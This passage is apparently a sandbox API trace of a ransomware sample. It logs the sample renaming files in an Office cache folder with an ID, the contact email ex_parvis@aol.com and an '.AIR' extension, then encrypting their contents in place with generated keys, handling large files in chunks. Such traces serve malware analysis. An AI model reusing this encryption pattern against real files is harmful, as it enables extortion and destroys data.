hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e148 | out: hHeap=0x2e0000) returned 1 [0156.409] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385a10 [0156.409] FindNextFileW (in: hFindFile=0x35e218, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80b17dc0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80b17dc0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x468a2b70, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2213, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisiorWW.xml", cAlternateFileName="")) returned 1 [0156.409] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0156.409] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0156.409] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0156.409] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0156.409] GetLastError () returned 0x0 [0156.409] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0156.410] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0156.410] GetLastError () returned 0x0 [0156.410] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e148 [0156.410] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0156.410] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0156.410] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0156.410] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0156.410] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e148 | out: hHeap=0x2e0000) returned 1 [0156.410] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385ab8 [0156.410] FindNextFileW (in: hFindFile=0x35e218, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80b17dc0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80b17dc0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x468a2b70, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2213, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisiorWW.xml", cAlternateFileName="")) returned 0 [0156.410] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385b60 [0156.410] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0156.410] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0156.410] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0156.410] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0156.410] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml", dwFileAttributes=0x80) returned 1 [0156.411] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 76 [0156.411] GetProcessHeap () returned 0x2e0000 [0156.411] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfe) returned 0x363a50 [0156.412] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" [0156.412] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0156.412] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0156.414] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c [0156.414] GetProcessHeap () returned 0x2e0000 [0156.414] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0156.414] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=8723) returned 1 [0156.414] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x2213 [0156.415] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0156.415] GetProcessHeap () returned 0x2e0000 [0156.415] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0156.415] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0156.415] WriteFile (in: hFile=0x37c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0156.416] WriteFile (in: hFile=0x37c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0156.416] WriteFile (in: hFile=0x37c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0156.417] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x2213) returned 0x3a7410 [0156.417] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x2213) returned 0x3a9630 [0156.417] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.417] ReadFile (in: hFile=0x37c, lpBuffer=0x3a7410, nNumberOfBytesToRead=0x2213, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a7410*, lpNumberOfBytesRead=0x2acf9c8*=0x2213, lpOverlapped=0x0) returned 1 [0156.417] SetFilePointer (in: hFile=0x37c, lDistanceToMove=-8723, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.417] WriteFile (in: hFile=0x37c, lpBuffer=0x3a9630*, nNumberOfBytesToWrite=0x2213, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a9630*, lpNumberOfBytesWritten=0x2acf9c8*=0x2213, lpOverlapped=0x0) returned 1 [0156.417] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7410 | out: hHeap=0x2e0000) returned 1 [0156.417] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a9630 | out: hHeap=0x2e0000) returned 1 [0156.417] CloseHandle (hObject=0x37c) returned 1 [0156.418] GetProcessHeap () returned 0x2e0000 [0156.418] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0156.418] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0156.418] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0156.418] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385b60 | out: hHeap=0x2e0000) returned 1 [0156.418] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385ab8 | out: hHeap=0x2e0000) returned 1 [0156.418] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385ab8 [0156.418] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0156.418] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0156.419] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0156.419] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0156.419] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi", dwFileAttributes=0x80) returned 1 [0156.419] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 76 [0156.419] GetProcessHeap () returned 0x2e0000 [0156.419] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfe) returned 0x363a50 [0156.419] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" [0156.419] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.12781717671972518758.ex_parvis@aol.com.AIR" [0156.419] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0156.422] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c [0156.422] GetProcessHeap () returned 0x2e0000 [0156.422] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0156.422] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=12060672) returned 1 [0156.422] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xb80800 [0156.422] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0156.422] GetProcessHeap () returned 0x2e0000 [0156.422] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0156.422] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0156.422] WriteFile (in: hFile=0x37c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0156.424] WriteFile (in: hFile=0x37c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0156.424] WriteFile (in: hFile=0x37c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0156.424] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb80800) returned 0x33d0020 [0156.424] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb80800) returned 0x3f60020 [0156.425] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.425] ReadFile (in: hFile=0x37c, lpBuffer=0x33d0020, nNumberOfBytesToRead=0xb80800, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0xb80800, lpOverlapped=0x0) returned 1 [0157.131] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0157.131] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0157.131] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab", dwFileAttributes=0x80) returned 1 [0157.132] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 76 [0157.132] GetProcessHeap () returned 0x2e0000 [0157.132] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfe) returned 0x363a50 [0157.132] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" [0157.132] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.12781717671972518758.ex_parvis@aol.com.AIR" [0157.132] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0157.135] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c [0157.135] GetProcessHeap () returned 0x2e0000 [0157.135] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0157.135] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=195011319) returned 1 [0157.135] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xb9fa2f7 [0157.135] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0157.135] GetProcessHeap () returned 0x2e0000 [0157.135] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0157.135] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0157.135] WriteFile (in: hFile=0x37c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0157.142] WriteFile (in: hFile=0x37c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0157.142] WriteFile (in: hFile=0x37c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0157.143] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100000) returned 0x33d0020 [0157.143] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100000) returned 0x34e0020 [0157.143] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x1300000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.143] ReadFile (in: hFile=0x37c, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0157.175] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0xb9fa3ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.175] WriteFile (in: hFile=0x37c, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0157.175] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x2600000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.175] ReadFile (in: hFile=0x37c, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0157.239] SetFilePointer (in: hFile=0x37c, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2600000 [0157.239] WriteFile (in: hFile=0x37c, lpBuffer=0x34e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x34e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0157.241] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0xb9fa3ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.241] WriteFile (in: hFile=0x37c, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0157.241] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x3900000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.241] ReadFile (in: hFile=0x37c, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0157.248] SetFilePointer (in: hFile=0x37c, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3900000 [0157.248] WriteFile (in: hFile=0x37c, lpBuffer=0x34e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x34e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0157.250] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0xb9fa3ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.250] WriteFile (in: hFile=0x37c, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0157.250] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x4c00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.250] ReadFile (in: hFile=0x37c, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0157.263] SetFilePointer (in: hFile=0x37c, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4c00000 [0157.263] WriteFile (in: hFile=0x37c, lpBuffer=0x34e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x34e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0157.265] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0xb9fa3ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.266] WriteFile (in: hFile=0x37c, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0157.266] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x5f00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.266] ReadFile (in: hFile=0x37c, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0157.303] SetFilePointer (in: hFile=0x37c, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5f00000 [0157.303] WriteFile (in: hFile=0x37c, lpBuffer=0x34e0020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x34e0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0157.306] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0xb9fa3ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.306] WriteFile (in: hFile=0x37c, lpBuffer=0x2acf9c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x2acf9c0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0157.306] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x7200000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.306] ReadFile (in: hFile=0x37c, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x100000, lpOverlapped=0x0) returned 1 [0157.319] SetFilePointer (in: hFile=0x37c, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7200000 [0157.319] WriteFile (in: hFile=0x37c, 